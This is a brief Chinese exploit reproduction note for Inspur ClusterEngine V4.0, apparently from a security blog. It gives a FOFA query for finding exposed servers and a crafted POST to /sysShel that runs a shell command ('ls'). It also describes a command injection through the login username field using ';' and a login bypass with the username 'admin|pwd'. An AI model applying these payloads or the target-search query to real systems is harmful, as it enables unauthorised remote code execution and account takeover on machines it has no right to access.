浪潮 ClusterEngineV4.0 任意命令执行

1、浪潮ClusterEngineV4.0 任意命令执行

影响版本 ClusterEngineV4.0

2、漏洞影响

远程代码执行

3、复现

fofa语句 title='TSCEV4.0'

 

 抓包构造exp

 

 

POST /sysShel

......

op=doPlease&node=cu01&command=ls

 

4、username远程代码执行

登录抓包，闭合username参数

 

使用;进行命令分割

 

 5、任意用户登录

用户名输入admin|pwd,密码任意

 

 成功登录

 

 

 6、参考链接

https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul

https://blog.csdn.net/DUANYU23/article/details/115499280